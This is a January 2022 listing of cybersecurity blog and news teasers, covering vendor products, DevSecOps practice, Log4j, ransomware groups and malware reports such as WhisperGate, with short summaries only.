January 2022

Crossword Cybersecurity supports techUK's SME Membership with Cyber Essentials certification and access to Rizikon Assurance

Crossword Cybersecurity Plc is today announcing that its online software assurance platform, Rizikon Assurance, is being made freely available to members of UK technology trade association, techUK for a single-use cyber security assessment to support them towards Cyber Essentials certification.

DevSecOps in an Agile Environment

At first glance, DevSecOps and Agile can seem like different things. In reality, the methodologies often complement each other. Let’s see how. Agile is a methodology that aims to give teams flexibility during software development. DevSecOps is about adding automated security to an existing automated software development process. Both are methodologies that require high levels of communication between different stakeholders and continuous improvement as part of the process.

Key Criteria for Choosing Mobile App Security Solution Vendor

Mobile phone apps are more popular than ever with a rapidly expanding user base each year. They have literally made everything come to the fingertips of the users and there’s a significant demand for mobile apps for just about everything, generating great competition and pressure among app developers around the world.

NFTs - Protecting the investment

This blog was written by an independent guest blogger. Non-fungible tokens (NFTs) are the new player in the financial investment market. They’ve seen tremendous interest from a wide range of parties, whether that be institutional investors or retail hobbyists looking to find an angle. As with anything involving money, malicious actors are already starting to take hold; Insider magazine recently highlighted the 265 Ethereum (roughly $1.1 million) theft due to a fraudulent NFT scheme.

Threat intelligence outlook 2022: what we can learn from the past year

In this blog post, we discuss the key security issues of the last year and explore what this could mean for 2022. With the continuous exploitation of vulnerabilities which took place in 2021 likely to continue in 2022 and beyond, organisations can benefit from conducting tabletop exercises using some of the scenarios presented below.

CrowdStrike Powers MXDR by Deloitte, Offering Customers Risk Mitigation with Powerful Customized and Managed Security Services

Deloitte, a leader in managed security services, has launched MXDR by Deloitte — a Managed Extended Detection and Response suite of offerings — within which the CrowdStrike Falcon® platform will power a number of solutions. MXDR by Deloitte combines an integrated, composable and modular managed detection and response SaaS platform with managed security services in a unified offering of advanced, military-grade threat hunting, detection, response and remediation capabilities.

Mind the MPLog: Leveraging Microsoft Protection Logging for Forensic Investigations

In an incident response investigation, CrowdStrike analysts use multiple data points to parse the facts of who, what, when and how. As part of that fact-finding mission, analysts investigating Windows systems leverage the Microsoft Protection Log (MPLog), a forensic artifact on Windows operating systems that offers a wealth of data to support forensic investigations. MPLog has proven to be beneficial in identifying process execution and file access on systems.

How to Use SSH Agent Safely

The SSH agent (ssh-agent) is an SSH key manager that stores the SSH key in a process memory so that users can log into SSH servers without having to type the key’s passphrase every time they authenticate with the server. In addition to the key management feature, SSH agent supports agent forwarding, which helps to authenticate with servers that sit behind a bastion or jump server.

Bringing home the beacon (from Cobalt Strike)

Elastic Security engineers have documented a less tedious way to find network beaconing from Cobalt Strike. In their full analysis, Elastic Security team researchers Andrew Pease, Derek Ditch, and Daniel Stepanic walk users through the Elastic fleet policy, how to collect the beacon, beacon configuration, how to analyze its activity, and how you can set it up in your organization’s environment.

How Lunar shifted security left while building a cloud native bank

At SnykCon 2021, there were a number of insightful talks from companies that were able to build successful AppSec programs. As the Lead Platform Architect at Lunar and a Cloud Native Computing Foundation (CNCF) ambassador, Kasper Nissen’s presentation was no exception. In this post, we’ll recap Nissen’s talk about how his security team at Lunar was able to shift security left while building a cloud native bank.

You Didn't Ask? Well, the SOC Evolution Answered Anyway

Let me begin by stating the obvious: The cyberattack surface is growing exponentially and diversely. Essentially, it’s a bigger shark and we’ve got the same small boat. The environments, platforms, services, regions and time zones that constitute modern enterprise operations and drive digital transformation for business continue to require increasing specialization and expertise beyond current in-house capabilities.

DevSecOps tool examples that will alleviate your workload

Nowhere is this more apparent than in DevSecOps where developers and releases outnumber security experts by thousands to one. It’s simply not feasible for the security teams to manually tackle flagged issues with any kind of accuracy—and have any time left in the day to - you know - eat and sleep!

Application Security in 2022 Misses the Big Picture

I recently ran an unofficial poll on LinkedIn asking how people found every instance of Log4J in their application portfolio. The options I gave were CMDB (Configuration Management Database), SBOM (Software Bill of Materials), SCA (Software Composition Analysis), and internal detective work. The overwhelming majority, 54% to be exact, said internal detective work. These results got me thinking as organizations spend millions of dollars a year on CMDB, SBOM, and SCA technologies.

Governance Test Drive

Ever wanted to try out Egnyte’s security and governance capabilities, in order to protect your company’s sensitive data more effectively? You can with Egnyte’s Governance Test Drive! To access Test Drive, navigate to Settings, Plan Details, and Change plan. Then select Open Secure and Govern Demo. Test Drive allows you to explore connected content sources with standardized data so you can see the impact of issues like Suspicious Logins, Unusual Access, and Probable Ransomware;

Intro to Torq: Chatbots

The challenges and workloads facing today’s security teams are not getting easier, but the response methods of security teams are still manual, utilizing a patchwork of security tools that are not connected nor communicating with each other. What if you could utilize your organization’s most common communication tool (i.e. Slack) to bring security communications and operations into every part of your organization?

Exploring influences on SSC grades for insurance companies

This blog was written by an independent guest blogger. There are more online stores and services available than ever, and you are able to shop for almost anything online whether it's groceries or insurance. There are many ways to protect yourself while browsing the internet, and one of those ways is to choose reputable businesses with strong security. Although there are standards for online businesses to follow, some have better safety measures in place than others.

How Penetration Testing Helps Cloud DLP

The market for penetration testing is expected to reach $3.1 billion by 2027, rising at a market growth of 12% CAGR during this time. Fueled by the rising number of mega-breaches and more sophisticated attacks, IT teams are taking a more proactive approach, using penetration testing to validate and improve their security configurations. As more organizations do business on SaaS and cloud programs, penetration testing is becoming an important complement to cloud data loss prevention tools.

Bringing human-centric security to everyone

As our online lives become subject to new and evolving threats, we’re doubling down on protecting the digital privacy and peace of mind of everyday people – at home and at work. 1Password has raised $620 million (USD) in the largest funding round ever for a Canadian company. Our latest round was led by ICONIQ Growth, with participation from other wonderful partners including Accel, Tiger Global, Lightspeed Venture Partners, and Backbone Angels.

Share Large Genomics Files With CROs To Support Clinical Programs

Increasingly, life science companies are applying omics-based testing to clinical trials. These tests support precision medicine models for the study of rare cancers and other diseases. Genomics research tests, for example, can help account for diverse drug responses and outcomes caused by genetic differences in trial participants.

Elastic Security verifies new destructive malware targeting Ukraine: Operation Bleeding Bear

Elastic Security has verified a new destructive malware targeting Ukraine: Operation Bleeding Bear. Over the weekend, Microsoft released details about this multi-stage and destructive malware campaign that the Ukrainian National Cyber Security Coordination Center has been referring to as Operation Bleeding Bear.

Enabling policy as code (PaC) with OPA and Rego

The Cambridge Dictionary defines a policy as: “a set of ideas or a plan of what to do in particular situations that has been agreed to officially by a group of people, a business organization, a government, or a political party.” And in the context of software development, your organization may have some rules about how a policy is built, configured, deployed, and used. Some examples of software policies include.

$6 Million Savings: How Rapid Insights Led To Valuable Network Upgrades

When a large government agency decided to refresh its infrastructure down to Layer 2 switches, Forward Networks data delivered over $6 million in savings. Like many companies around the world, this organization had challenges getting full visibility into the structure of its network, which had grown organically over time.

Explosion in E-Commerce Shines a Spotlight on Vulnerability Management in Retail

The retail sector has its own unique cybersecurity risks, especially given the growing emphasis on online commerce. The trend toward purchasing goods and services on the internet has been going on for years. But the volume of e-commerce has seen a sharp increase since the beginning of the pandemic, when many physical stores were forced to lock down or consumers simply opted to buy online rather than visiting brick-and-mortar locations.

Using Z3 Theorem Prover to analyze RBAC

Z3 is a satisfiability modulo theories (SMT) solver developed by Microsoft Research. With a description like that, you’d expect it to be restricted to esoteric corners of the computerized mathematics world, but it has made impressive inroads addressing conventional software engineering needs: analyzing network ACLs and firewalls in Microsoft Azure, for example.

What is CI/CD? A Complete Guide to CI/CD

Software development cycles have changed immensely in the last ten years. New practices and design philosophies are being tried every day. One of these practices is CI/CD pipelines, utilizing aspects of agile software development paired with automation and robust testing. In this post, we’ll be covering all aspects of CI/CD, as well as some popular CICD tools your organization can use to implement a CI/CD pipeline.

Why Your Organization Needs Comprehensive Security Operations

How prepared is your business to fend off bad actors seeking to infiltrate your network systems and breach your data? Imagine, if you will, the following scenario: It’s 5:30 am, and an employee has just clicked a malicious link in a phishing email. An attacker, armed with ransomware, has just gained access to your enterprise.

Bob Saget and open source license compliance

Unique open source licenses provide amusement for developers but they create extra work for legal teams overseeing a company’s IP. Several of my open source friends had the same reaction when they heard of the death of Bob Saget. Sadly, the actor/comedian passed away last week at a relatively young age, and with him went an increment of open source license risk. Wait… what?

Endpoint Detection and Response (EDR) for containers and Kubernetes - Sysdig Secure

The increasing number of yearly reported data breaches and new critical vulnerabilities, such as log4j, impacting both small and large businesses shows that cyberthreats are real and targeting everyone. You can minimize risk by implementing runtime security and having an incident response plan in place to contain attacks. But, in container environments, responding fast to incidents is challenging.

Technical Analysis of the WhisperGate Malicious Bootloader

On Jan. 15, 2022, a set of malware dubbed WhisperGate was reported to have been deployed against Ukrainian targets. The incident is widely reported to contain three individual components deployed by the same adversary, including a malicious bootloader that corrupts detected local disks, a Discord-based downloader and a file wiper. The activity occurred at approximately the same time multiple websites belonging to the Ukrainian government were defaced.

The Top 10 Cybersecurity Threats Impacting the Public Sector

From nation-state threat actors to typical cybercriminals, the public sector faces a multitude of cybersecurity threats. At the same time, public-sector organizations struggle to maintain a robust cyber hygiene posture because they need to balance limited budgets with complex IT environments and highly interconnected ecosystems.

Setting up a Kubernetes cluster

Kubernetes is an open-source platform for governing clusters of containerized application services. Kubernetes automates the vital aspects of container lifecycle management, including scaling, replication, monitoring, and scheduling. The central component of Kubernetes is a cluster, which is itself made up of multiple physical or virtual machines.

6 Things Cyber Insurers Are Looking for in Cyberattack Claim Applications

The modern digital environment is more risky than ever before, and the incidence of cyberattacks only increased throughout the COVID-19 pandemic. In this day and age, even the most robust security systems may still be penetrated or breached by a sophisticated cyber-attack. This means companies can no longer afford to be complacent about security.

Tips for Defending Against Adversarial Actions Regardless of Their Origin

When an unfortunate event occurs, people tend to be curious about who was responsible for the event. It can be interesting and helpful to know who your enemy is and what their motives might be. But in cybersecurity, the primary focus is ultimately on preventative and detective measures to avoid similar issues. Let’s use a recent example to illustrate this point below.

CloudCasa - How to Deploy CloudCasa on a Rafay Managed Cluster

With Rafay and CloudCasa, enterprises can manage and protect Kubernetes distributions and immediately gain centralized automation, security, visibility, data protection and governance capabilities for Kubernetes and application lifecycle management – across public clouds such as AWS, Azure and GCP.

A Day In The Life Of A Field CISO - Steve Kinman

CISO Journey: What is the CISO role like? What was it like being an operational CISO vs. a field CISO? Right now we are talking only about Log4j issues; how would that have been for you, and what would your strategy have been? Have you seen other field CxOs? What is one unique thing you are trying to implement? How different is this role from a regular CISO?

Securing a World of Physically Capable Computers with Bruce Schneier

Computer security is no longer about data; it's about life and property. This change makes an enormous difference, and will shake up our industry in many ways. First, data authentication and integrity will become more important than confidentiality. And second, our largely regulation-free Internet will become a thing of the past.

Getting the best out of Samsung Knox management with Mobile Device Manager Plus

In case you missed it, Samsung Knox has verified Mobile Device Manager Plus as a Knox Validated Partner solution. This means that our EMM solution meets its business-level requirements for 2022, and that we support a wide range of features to help you get the best out of all your mobile devices that support Samsung Knox capabilities.

When It comes to Cybersecurity - An ounce of prevention

So, to what extent are we able to protect ourselves from Cybersecurity events? With the alphabet soup of acronyms out there such as NIST, ISO, SOC, CISA, DevSecOps, etc., protecting your business from Cybersecurity threats can be overwhelming. Making Cybersecurity a priority can save your business down the road. Threat Actors, once in, may lay dormant for months much like a human virus.

How to access 70% of Wi-Fi networks in a residential neighborhood

Israeli cybersecurity researcher and analyst Ido Hoorvitch has published the results of an experiment he conducted on residential Wi-Fi networks and the findings were surprising: he was able to crack about 70% of the hashes from residential Wi-Fi networks in one Tel Aviv neighborhood.

Power the SOC of the Future with the DataLinq Engine - Part 3

In my first blog in this three-part series, we discussed the importance of data to the modern SOC, and the unique approach of ThreatQ DataLinq Engine to connect the dots across all data sources, tools and teams to accelerate detection, investigation and response.

Top 7 BFSI Cybersecurity Trends for the Year 2022 that you Need to Know

BFSI (Banking, Financial Service and Insurance) organizations have remained a primary target of cybercriminals over the last several years. Given the amount of sensitive data that the BFSI sector has to deal with, they become an obvious goldmine for hackers and that is why they have to prioritise cybersecurity above all else. As a matter of fact, more than 70% of fintech companies cited information security as their top concern in the Sixth Annual Bank Survey.

Snyk Code scanning added to the Snyk Visual Studio extension

Snyk Code provides a new generation of static application security testing (SAST). It uses a unique process that combines machine learning, to rapidly grow its knowledge base, with review by a Snyk security engineer to assure the quality of the rules. As a result, the Snyk Code knowledge base grows exponentially and results in an industry-leading high accuracy. On top of that, Snyk Code provides real-time scanning so developers can use it right from their favorite IDE.

Five Cryptography best practices for developers

Learn about the five cryptography best practices every developer should follow to secure their applications. Cryptography is a huge subject with dedicated experts, but that doesn’t mean developers can leave it entirely to their security teams. Building security into DevOps means you need to understand how to deliver secure, high-quality code at velocity. Having some basic cryptography under your belt will help.

Vulnerable AWS Lambda function - Initial access in cloud attacks

Our security research team will explain a real attack scenario from the black box and white box perspective on how a vulnerable AWS Lambda function could be used by attackers as initial access into your cloud environment. Finally, we show the best practices to mitigate this vector of attack. Serverless is becoming mainstream in business applications to achieve scalability, performance, and cost efficiency without managing the underlying infrastructure.

A CISO's Point of View on Log4j

No sooner did word start to spread about Apache Log4j than the usual torrent of blaring headlines, vendor marketing, and tips and tricks-style “information” quickly followed. You can find plenty of solid technical analysis out there about Log4j, and we’ve already posted information about Netskope protections and threat coverage from Netskope Threat Labs. But that’s not this post.

Distributed Tracing with Datadog

Here at Nightfall we ensure that we are always using the most appropriate technology and tools while building services. Our architecture involves serverless functions, relational and NoSQL databases, Redis caches, Kafka and microservices written in Golang and deployed in a Kubernetes cluster. To effectively monitor and easily troubleshoot our services, we use distributed tracing across our services.

Combatting Insider Threats in Remote Learning Environments Introduction

Remote learning is now an inevitable reality for academic institutions. Even before the pandemic, remote learning was on the rise. The pandemic has only made that trend more pervasive and dominant across institutions, most notably among the public schools. The Multi-State Information Sharing and Analysis Center (MS-ISAC), a federally funded threat intelligence and cybersecurity advisory organization, recorded a 19% increase in cyberattacks targeting K-12 schools in the 2019-2020 school year.

What Is Enterprise Information Security Architecture?

Spending on security and risk management is soaring worldwide. But exactly which improvements should you focus on next to best strengthen your cybersecurity program? For many organizations, building a solid information security architecture should be at the top of the list. Read on to learn what information security architecture is and how it can help you protect your critical IT assets from security threats with less work and worry.

How to Fulfill Multiple Compliance Objectives Using the CIS Controls

Earlier this year, I wrote about what’s new in Version 8 of the Center for Internet Security’s Critical Security Controls (CIS Controls). An international consortium of security professionals first created the CIS Controls back in 2008. Since then, the security community has continued to update the CIS Controls to keep pace with the evolution of technology ecosystems and emerging threat vectors—all the way to Version 8 and the 18 Controls contained therein.

Designing a 100-Day Sprint for OT Cybersecurity: What to Consider

As we begin a new year, many organizations will enter a “goal-setting and strategic planning” season. During this time, individuals are re-energized and motivated to record new accomplishments for their professional development. Traditional corporate goal setting aligns with fiscal calendars and forces companies and individuals to build goals in chunks of 365 days. But why set your deadline based on the Earth’s orbital period?

How Marketers Use Egnyte

Chief Marketing Officer David Spitz showcases how he uses Egnyte while working on the go. This video shares how to transition between offline and in-cloud work, co-edit with Google Workspace and Microsoft Office and create folder and document templates. Whether it's an urgent press release, ad copy, or an analyst briefing, you can collaborate with team members and stay on top of tasks all within Egnyte.

How to use DevSecOps to reduce and focus issues raised?

One of the biggest challenges when rolling out a DevSecOps process is the volume of issues it can bring to light. From a development point of view, we don’t want the implementation of security in DevOps to give the dev team massive lists of vulnerabilities to check over on every build or release. We want to avoid anything that might cause unforeseen delays to keep everything on track - but we also want the application to be secure.

How to measure security metrics & continuous improvement in DevSecOps?

Many security departments and management teams want to improve their processes. DevSecOps introduces the ability for much more granular measurements than traditional manual security testing. Even simple measures can highlight gaps and areas for improvement where the budget can be spent. In this video Founder and CSO, Gary Robinson, takes a closer look at the challenges of KPI metrics for software testing.

The Big Fix 2022 - Getting Started Guide

The Big Fix brings together developers, DevOps, and security practitioners of all skill levels to help make the internet more secure. Our goal is to make security 100x better in 2022 by finding and fixing 202,200 security vulnerabilities! Join us to help find (and fix!) security vulnerabilities while making friends and winning swag. In this short video we'll help you get started finding (and fixing!) security vulnerabilities in your applications -- it's easy!

Introduction to Advanced Analytics (Part 2)

Start building dashboards and widgets using the tools in Explore - Part 2. Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Live Hacking: Find Vulnerabilities in Your Apps Before Hackers Do

As cloud-native technologies disrupt the Application Security (AppSec) market, forward-thinking enterprises are shifting their security to the left. A range of cutting-edge security platforms is now available, empowering developers to build secure applications within the development process. But what do secure applications look like, and why does it matter? Why are enterprises implementing security during the deployment phase?

Benefits of Cyber Security: Importance for Businesses and Individuals

Cyber security is a crucial element of the digital age. You may not notice it, but cyber attacks are happening every day to companies and individuals alike. We’ve got you covered with this detailed guide on the importance and benefits of cyber security along with the mitigation strategies and tips for protection against cyber attacks.

The THIP Model: Embedding Emotional Intelligence in Third-Party Risk Management

Third-party risk management (TPRM) has grown in prominence as organizations increase their reliance on external parties, from cloud providers to credit card processors. As more enterprises invest in this critical business function, certain best practices are becoming key to a successful TPRM program.

How to keep your business secure during the Great Resignation

Millions of workers are leaving their jobs after enduring stay-at-home lockdowns and reflecting on what they need to be truly happy and healthy. While the ‘Great Resignation’ could have a positive impact on society, it also represents a security risk for businesses of all sizes.

Running Kubernetes on AWS Fargate

For the last decade, AWS has dominated the cloud computing space with a plethora of cloud services. One of AWS’ great innovations was AWS Fargate, their first containers as a service (CaaS) offering. Prior to the introduction of Fargate, those building in the cloud were forced to choose between IaaS paradigm-focused containers or FaaS-focused serverless functions.

Latest FBI Warning: Don't Trust Thumb Drives

The FBI recently warned and advised on a current scam in which bad actors mail malicious thumb drives in packages and trick recipients into thinking there is a legitimate reason for connecting the thumb drive to their computer. Let’s be clear. DON’T. Don’t stick that thing in your computer. You don’t know where it’s been!

The Supply Chain Needs Better Cybersecurity and Risk Management

The supply chain is under a historic amount of pressure, but the strain on its cybersecurity and risk management may be in even worse condition. As 2021 draws to a close, the global supply chain is in a state comparable to rush-hour traffic in bad weather. Everything seems to be backed up whether due to supply and demand issues, wait times at shipping ports, or any number of other delays.

Cybersecurity Statistics of 2021 & Predictions for 2022

Now is a great time to look back on cybersecurity statistics for 2021. They can help IT professionals understand which issues from last year may carry over into 2022. However, it’s also useful to gain expert insights on likely cybersecurity scenarios impacting this year. Knowing about threats makes it easier to combat them. Here are 10 cybersecurity statistics from 2021 and five predictions for 2022.

California Consumer Privacy Act (CCPA) Compliance: What you need to know to be compliant

The California Consumer Privacy Act (CCPA) is a law that was passed in 2018, and it has been in effect since January 1st 2020. The California attorney general’s office did not take any enforcement action against firms that did not meet the standards until July 1st 2020. A lot of people are unsure about what this new law means for them. Like the GDPR, there are significant penalties for non-compliance with the CCPA, as well as potential loss of consumer loyalty.

Managed Security Awareness: Beyond the Breach | Ransomware Infected Thumb Drives

The FBI has warned of a FIN7 cybercrime campaign in which attackers mail USB thumb drives to American organizations with the goal of delivering ransomware into their environments. Our latest Arctic Wolf Managed Security Awareness session, Beyond the Breach, breaks down what to look for and how to respond, shares background on this new cybercrime, and offers guidance on how to protect your organization.

MDR or MSSP? A Comparison Guide

In today's hyper-connected world, cyberattack risks have never been more pronounced. Threat actors continue to develop malicious, ingenious tricks and techniques to stay one step ahead of security systems and response specialists. As a result, a more focused and proactive approach to detecting, investigating, and responding to threats is required. In this guide, we break down the comparison between Managed Detection and Response (MDR) and Managed Security Services (MSS) and how to determine what to look for in providers.

Security Service Edge (SSE) For Dummies

Grab your copy of the first ever book on SSE. Security Service Edge (SSE) is described by Gartner as the security stack of services within a SASE architecture. SSE is fast, easy to use, and secures your business wherever your people and data go. Download the very first SSE For Dummies book on the market, where we cut through the acronyms to give you a functional understanding of how this set of tools will impact your security going forward.

Database Security in a Zero Trust Architecture

It is no secret that many organizations can do better with their security programs. Zero Trust allows for an evolution of an organization's strategy. It also forces organizations to rethink their approach to securing data to meet the requirements of data privacy regulations and expectations from their customers and business partners. Risk-minded organizations take the Zero Trust mindset and adopt it as best they can to fit their current and future state infrastructure.

Web Application Penetration Testing: Introduction And Benefits

Web application pen testing is the act of analysing a web application through the perspective of an attacker in order to identify potential vulnerabilities and provide feedback on how to improve security. This video will cover what Web Application Pen Testing is, the benefits it provides, and some common vulnerabilities that are identified during this process.

Weekly Cyber Security News 14/01/2022

A selection of this week’s more interesting vulnerability disclosures and cyber security news. For a daily selection see our twitter feed at #ionCube24. In an act of ‘revenge’ or retaliation against the unpaid or even unaccredited use of FOSS by commercial entities, one developer did something that has created a large amount of discussion (which is a good thing) but at what cost?

Complete Guide to Common Cloud Misconfigurations and How to Avoid Them

Companies are increasingly moving their IT operations to IaaS (infrastructure-as-a-service) solutions. Gartner estimates that by 2022, about 60% of business entities will be leveraging cloud-managed offerings, doubling the recorded use in 2018. Cloud offerings like Amazon Web Services (AWS) are generally secure. But since IaaS uses a shared security model, there's a great chance of data security issues, including cybersecurity and workload concerns.

How Vulnerability Management Secures Supply Chain and Production in Manufacturing

Manufacturing is one of those industries that seems like a natural fit for vulnerability management, in part because these companies can be such easy targets for cyber criminals. Manufacturers in many cases operate far-flung, global facilities including factories, warehouses, and other distribution points. Increasingly, these different facilities are connected as companies look to modernize their operations through digital transformation.

Vulnerability Management Keeps Systems Running in Critical Infrastructure

Assessing the security risks of critical infrastructure organizations is a bit of a challenge, because the category includes multiple industries. The U.S. Cybersecurity and Infrastructure Security Agency (CISA), which leads the nation’s effort to manage and reduce risk to cyber and physical infrastructure, identifies 16 critical infrastructure sectors.

SSH Hardening Tips to Prevent Brute-Force Attacks

SSH servers are a common target for brute-force attacks. This is even more true if your infrastructure sits behind an SSH bastion, because attackers have no choice but to compromise the bastion host, either by exploitation or denial of service. In this article, we will list a few controls which will help you harden your SSH servers against brute-force attacks.

Arctic Wolf Joins Gartner Peer Insights Customer First Program

Arctic Wolf joins the Gartner Peer Insights Customer First Program in the vulnerability assessment and managed detection and response service. The members of the Arctic Wolf team are excited to announce that we have pledged to be a Customer First vendor in the vulnerability assessment and managed detection and response service. Our team at Arctic Wolf takes great pride in this program commitment, as customer feedback continues to be a critical priority and shapes our products and services.

1Password's 2021 year in review - everything you might have missed

If year-end reviews have taught us anything, it’s that people love recaps that cram 12 months of growth and change into a five minute digestible read. Last year we worked hard to bring easy but secure password management to everyone – businesses and individuals alike.

How To Protect and Store Sensitive Data in SaaS Platforms with Cloud DLP

Mega-breaches, or reported breach incidents that impact more than one million records, have increased dramatically. Our analysis shows that, on average, mega-breaches increased 36% year over year since 2016. In total, mega-breach incidents that we analyzed cost at minimum a combined $8.8 billion and exposed 51 billion records.

Cloud Threats Memo: Exploiting Legitimate Cloud Services for Command and Control

Welcome to the first edition in 2022 of our Cloud Threats Memo! One of the key findings of our Cloud and Threat Report – January 2022 is the leadership of Google Drive as the most exploited cloud app for the distribution of malware (and for the record, guess which service ranks at number two—spoiler alert: it is a cloud storage service from Microsoft). Unsurprisingly, this is not the only way in which threat actors can exploit these and other cloud services.

Russia's FSB Takes Down REvil Cyber Gang in an Unprecedented Series of Raids

Reuters reported on Friday that the Russian Federal Security Service (FSB) and local police launched a series of raids against members of the REvil/Sodinokibi ransomware gang at the request of the United States. More than a dozen arrests were made with millions in cash and goods being confiscated by authorities. This unprecedented action from the Russian Federal Security Service aligns with the fear that we've observed while conducting cybercriminal chatter reconnaissance on the Dark Web.

How Should Organizations Tackle Their Data Privacy Requirements?

Data is among the most valuable assets that need to be safeguarded at all costs. But in the digitally-driven business world, cybercrimes are prevalent, making data protection and data privacy a main focal point. The increasing use of technology and the growing exposure to evolving cyber threats have dramatically changed the data security and privacy landscape. For these reasons, international regulatory bodies around the world have created stringent data privacy laws for businesses to meet.

Why Is It Important to Invest in OT Cybersecurity for 2022?

As we enter 2022, it’s important that organizations invest in cybersecurity for their operational technology (OT) systems. Why? One of the reasons is that Industry 4.0 can sometimes introduce more risk for OT. This is evident in several Industry 4.0 market trends. For example, there’s digital twin infrastructure. That’s where you make a digital copy of your production facility or your machine.

Approaching Linux Post-Exploitation with Splunk Attack Range

With the recent release of Sysmon (System Monitor) for Linux by Microsoft, new opportunities for monitoring, detection development, and defense are now possible. Sysmon for Windows is a very popular tool among detection developers and blue teamers, as it provides extensive details from system activity and Windows logs. Due to the extensive information this service/driver provides in Microsoft Windows, it is very useful when researching attacks and replicating malicious payloads on lab machines.

How fraudsters bypass MFA to get into banks, brokers and crypto wallets

Passwords are dying as a sole security measure, particularly within financial services. It is widely expected (and in the UK, mandatory) that any institution responsible for finances, from banks to brokers and even crypto wallets, should be implementing multi-factor authentication (MFA) to prevent fraudsters gaining access to accounts using automated attacks, even if they know the user’s password.

What Are BlackMatter Ransomware Attacks?

Following the 2021 cyberattack on Colonial Pipeline that caused a nationwide supply-chain disruption, numerous cybersecurity companies and federal agencies increased their efforts to find and shut down ransomware groups and curb the rise of cyberattacks. Those efforts have resulted in the shutdown of Ransomware-as-a-Service (RaaS) groups such as DarkSide and REvil, which had been targeting critical infrastructure including healthcare providers and financial systems.

Egress Defend

Stop targeted email attacks with Egress Defend. We combine zero-trust models with intelligent linguistic and contextual analysis to detect the sophisticated cyberattacks that bypass your traditional email security solutions. Our real-time alerts and feedback provide teachable moments that clearly explain risk to users. This provides active learning that augments your security awareness training programs and builds a first line of defense against threats.

Egress Prevent

Stop email data loss with Egress Prevent. Prevent uses social graph and contextual machine learning technologies on desktop and mobile to accurately model user relationships. We then detect anomalous recipients in real time to avoid a damaging data breach. Importantly, we also supervise our machine learning algorithms with policies so Prevent can immediately detect more outbound risks, such as wrong attachments, conflicts of interest, data exfiltration, and weak TLS certificates.

Egress Protect

Make sending encrypted emails easy with Egress Protect. Our simple controls, combined with gateway encryption, mean you can send and revoke sensitive emails and large files securely, maintaining your compliance and removing risk. Our flexible authentication techniques remove friction and even allow trusted recipients seamless access to sensitive emails without having to log into a separate secure portal.

Egress Secure Workspace

Easily share confidential data with Egress Secure Workspace. Our encrypted environment offers enterprise-grade permissions at the click of a button. This enables employees to control how teammates and external partners interact with files to keep sensitive content secure. Secure Workspace can be used to share files of any size or format, and users can set controls to limit when and where recipients can access information, and what they can do with it. Robust anti-virus checks and accredited security frameworks provide additional protection.

Quick Tour and Creating a Report from Explore

Learn how to create a report from the Explore menu. Netskope, the SASE leader, safely and quickly connects users directly to the internet, any application, and their infrastructure from any device, on or off the network. With CASB, SWG, and ZTNA built natively in a single platform, Netskope is fast everywhere, data-centric, and cloud smart, all while enabling good digital citizenship and providing a lower total-cost-of-ownership.

Looking back: Analyst recognitions in 2021

The year 2021 started off with organizations slowly reopening their doors and welcoming back their employees. This couldn’t happen overnight, of course. It meant devising new IT strategies to accommodate a hybrid workforce. Ensuring the organization’s business continuity is crucial for its sustenance, and this became the IT department’s primary mission.

Appknox Research reveals 91% of Fintech Apps Fail Basic Security Tests

The unexpected and rapid switch from the global workforce to the WFH setup caused by the coronavirus pandemic has prompted companies around the world to make extensive infrastructure adjustments to support employees working exclusively from home. According to the new IDC forecast, the number of mobile workers in the US will steadily increase from 78.5 million in 2020 to 93.5 million in 2024 over the next four years.

Zero Trust Integrations Are Expanding in the CrowdStrike Partner Ecosystem

Organizations need to stay ahead of the ever-evolving security landscape. It’s no secret that Zero Trust security is crucial for successful endpoint protection. Due to the rapid transition to a remote workforce and shift from the traditional data center into dynamic cloud infrastructure we’ve witnessed in the last year, more and more companies are finding the need to accelerate their digital transformation to keep pace with the expanding threat surface.

Identifying beaconing malware using Elastic

The early stages of an intrusion usually include initial access, execution, persistence, and command-and-control (C2) beaconing. When structured threats use zero-days, these first two stages are often not detected. It can often be challenging and time-consuming to identify persistence mechanisms left by an advanced adversary as we saw in the 2020 SUNBURST supply chain compromise. Could we then have detected SUNBURST in the initial hours or days by finding its C2 beacon?

CISA Says: Generate and Audit a Software Bill of Materials (SBOM) to prepare for the next Log4j

Following the devastating vulnerabilities recently found in Log4j, the Cybersecurity & Infrastructure Security Agency (CISA) in the United States has pointed to the SBOM – called for in President Biden’s cybersecurity Executive Order (EO) – as a way to make remediation of similar vulnerabilities easier in the future. In light of this, we thought it would be useful to provide an easy overview of SBOMs – what they are, and how to obtain them.

Announcing Security Service Edge (SSE) for Dummies, the Industry's First SSE Book!

Security Service Edge (SSE) describes the evolving security stack crucial to a Secure Access Service Edge (SASE) journey, with core platform requirements that include CASB, SWG, and ZTNA capabilities. SASE is an architecture—really, a long-term journey that will change how we all think about security and networking. But SSE, as part of SASE, is a set of cloud-delivered security services you can acquire and make the most of today.

Malicious USB drives are being posted to businesses

A notorious cybercrime gang, involved in a series of high-profile ransomware attacks, has in recent months been sending out poisoned USB devices to US organisations. As The Record reports, the FBI has warned that FIN7 – the well-organised cybercrime group believed to be behind the Darkside and BlackMatter ransomware operations – has been mailing out malicious USB sticks in the hope that workers will plug them into their computers.

Styra 2021 Year in Review

It’s been a whirlwind year for Styra — from going fully remote as a company to raising $40 million in Series B Funding to more than doubling our workforce. We have a lot to be thankful for as a company, and before we say “goodbye” to 2021 and “hello” to 2022, I wanted to take a moment to recap some of my favorite moments and initiatives of this past year.

Linux-Targeted Malware Increases by 35% in 2021: XorDDoS, Mirai and Mozi Most Prevalent

Malware targeting Linux-based operating systems, commonly deployed in Internet of Things (IoT) devices, has increased by 35% in 2021 compared to 2020, according to current CrowdStrike threat telemetry, with the top three malware families accounting for 22% of all Linux-based IoT malware in 2021.

SSH Bastion Host Best Practices

SSH bastion hosts are an indispensable security enforcement stack for secure infrastructure access. Every security compliance standard that deals with remote infrastructure access (e.g., FedRAMP AC-17 - Remote Access, HIPAA §164.312(a)(1) - Access control, SOC2 CC6.1 - Manage Points of Access) mandates preventing direct network access to the servers and APIs.

MSP: What role does AI play in cybersecurity?

Artificial intelligence (AI) is playing an increasingly important role in cybersecurity. This is confirmed by a recent Pulse survey of 191 senior executives from companies on four continents: two out of three organizations (68%) say they are using tools that use AI technologies and among those who are not yet using AI, 67% are considering adopting it.

Small Talk: why cybersecurity matters beyond the office

